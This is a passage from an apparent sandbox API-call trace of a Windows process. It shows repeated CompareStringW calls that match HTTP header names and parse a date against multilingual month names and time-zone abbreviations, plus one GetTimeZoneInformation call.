(Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Range", cchCount2=13) returned 3 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Range", cchCount2=13) returned 3 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Range", cchCount2=13) returned 1 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Range", cchCount2=13) returned 3 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Date", cchCount2=4) returned 2 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mon", cchCount1=3, lpString2="SUN", cchCount2=3) returned 1 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mon", cchCount1=3, lpString2="MON", cchCount2=3) returned 2 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JAN", cchCount2=3) returned 1 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FEB", cchCount2=3) returned 1 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAR", cchCount2=3) returned 1 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="APR", cchCount2=3) returned 1 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAY", cchCount2=3) returned 1 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUN", cchCount2=3) returned 1 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUL", cchCount2=3) returned 1 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AUG", cchCount2=3) returned 1 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEP", cchCount2=3) returned 1 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OCT", cchCount2=3) returned 1 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="NOV", cchCount2=3) returned 1 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DEC", cchCount2=3) returned 1 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUNE", cchCount2=4) returned 1 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JULY", cchCount2=4) returned 1 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEPT", cchCount2=4) returned 1 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MRZ", cchCount2=3) returned 1 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAI", cchCount2=3) returned 1 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OKT", cchCount2=3) returned 1 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DEZ", cchCount2=3) returned 1 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="ENO", cchCount2=3) returned 1 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FBRO", cchCount2=4) returned 1 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MZO", cchCount2=3) returned 1 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AB", cchCount2=2) returned 1 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AGTO", cchCount2=4) returned 1 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SBRE", cchCount2=4) returned 1 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OBRE", cchCount2=4) returned 1 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="NBRE", cchCount2=4) returned 1 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DBRE", cchCount2=4) returned 1 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MRT", cchCount2=3) returned 1 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MEI", cchCount2=3) returned 1 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OKT", cchCount2=3) returned 1 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JANV", cchCount2=4) returned 1 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FÉV", cchCount2=3) returned 1 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MARS", cchCount2=4) returned 1 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AVR", cchCount2=3) returned 1 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAI", cchCount2=3) returned 1 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUIN", cchCount2=4) returned 1 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUIL", cchCount2=4) returned 1 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AOÛ", cchCount2=3) returned 1 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEPT", cchCount2=4) returned 1 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DÉC", cchCount2=3) returned 1 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FÉVR", cchCount2=4) returned 1 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUI", cchCount2=3) returned 1 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AOÛT", cchCount2=4) returned 1 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAJ", cchCount2=3) returned 1 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AVG", cchCount2=3) returned 1 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="JAN", cchCount2=3) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="FEB", cchCount2=3) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="MAR", cchCount2=3) returned 2 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="A", cchCount2=1) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACDT", cchCount2=4) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACST", cchCount2=4) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACT", cchCount2=3) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ADT", cchCount2=3) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AEDT", cchCount2=4) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AEST", cchCount2=4) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AFT", cchCount2=3) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AKDT", cchCount2=4) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AKST", cchCount2=4) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMST", cchCount2=4) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMST", cchCount2=4) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMT", cchCount2=3) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMT", cchCount2=3) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ART", cchCount2=3) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AST", cchCount2=3) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AST", cchCount2=3) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AWDT", cchCount2=4) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AWST", cchCount2=4) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AZOST", cchCount2=5) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AZT", cchCount2=3) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="B", cchCount2=1) returned 3 [0105.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BDT", cchCount2=3) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BIOT", cchCount2=4) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BIT", cchCount2=3) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BOT", cchCount2=3) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BRT", cchCount2=3) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BST", cchCount2=3) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BST", cchCount2=3) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BTT", cchCount2=3) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="C", cchCount2=1) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CAT", cchCount2=3) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CCT", cchCount2=3) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CDT", cchCount2=3) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CDT", cchCount2=3) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CEDT", cchCount2=4) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CEST", cchCount2=4) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CET", cchCount2=3) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHADT", cchCount2=5) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHAST", cchCount2=5) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHOT", cchCount2=4) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ChST", cchCount2=4) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHUT", cchCount2=4) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CIST", cchCount2=4) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CIT", cchCount2=3) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CKT", cchCount2=3) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CLST", cchCount2=4) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CLT", cchCount2=3) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="COST", cchCount2=4) returned 3 [0105.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="COT", cchCount2=3) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CT", cchCount2=2) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CVT", cchCount2=3) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CWST", cchCount2=4) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CXT", cchCount2=3) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="D", cchCount2=1) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="DAVT", cchCount2=4) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="DDUT", cchCount2=4) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="DFT", cchCount2=3) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="E", cchCount2=1) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EASST", cchCount2=5) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EAST", cchCount2=4) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EAT", cchCount2=3) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ECT", cchCount2=3) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ECT", cchCount2=3) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EDT", cchCount2=3) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EDT", cchCount2=3) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EEDT", cchCount2=4) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EEST", cchCount2=4) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EET", cchCount2=3) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EGST", cchCount2=4) returned 3 [0105.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EGT", cchCount2=3) returned 3 [0105.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EIT", cchCount2=3) returned 3 [0105.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EST", cchCount2=3) returned 3 [0105.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EST", cchCount2=3) returned 3 [0105.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EST", cchCount2=3) returned 3 [0105.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="F", cchCount2=1) returned 3 [0105.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="FET", cchCount2=3) returned 3 [0105.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="FJT", cchCount2=3) returned 3 [0105.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="FKST", cchCount2=4) returned 3 [0105.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="FKST", cchCount2=4) returned 3 [0105.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="FKT", cchCount2=3) returned 3 [0105.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="FNT", cchCount2=3) returned 3 [0105.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="G", cchCount2=1) returned 3 [0105.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="GALT", cchCount2=4) returned 3 [0105.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="GAMT", cchCount2=4) returned 3 [0105.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="GET", cchCount2=3) returned 3 [0105.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="GFT", cchCount2=3) returned 3 [0105.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="GILT", cchCount2=4) returned 3 [0105.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="GIT", cchCount2=3) returned 3 [0105.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="GMT", cchCount2=3) returned 2 [0105.962] GetTimeZoneInformation (in: lpTimeZoneInformation=0x19faa8 | out: lpTimeZoneInformation=0x19faa8) returned 0x1 [0105.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Last-Modified", cchCount2=13) returned 1 [0105.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Last-Modified", cchCount2=13) returned 3 [0105.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Last-Modified", cchCount2=13) returned 1 [0105.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Last-Modified", cchCount2=13) returned 1 [0105.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Expires", cchCount2=7) returned 1 [0105.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Expires", cchCount2=7) returned 3 [0105.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Expires", cchCount2=7) returned 1 [0105.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Expires", cchCount2=7) returned 1 [0105.963] 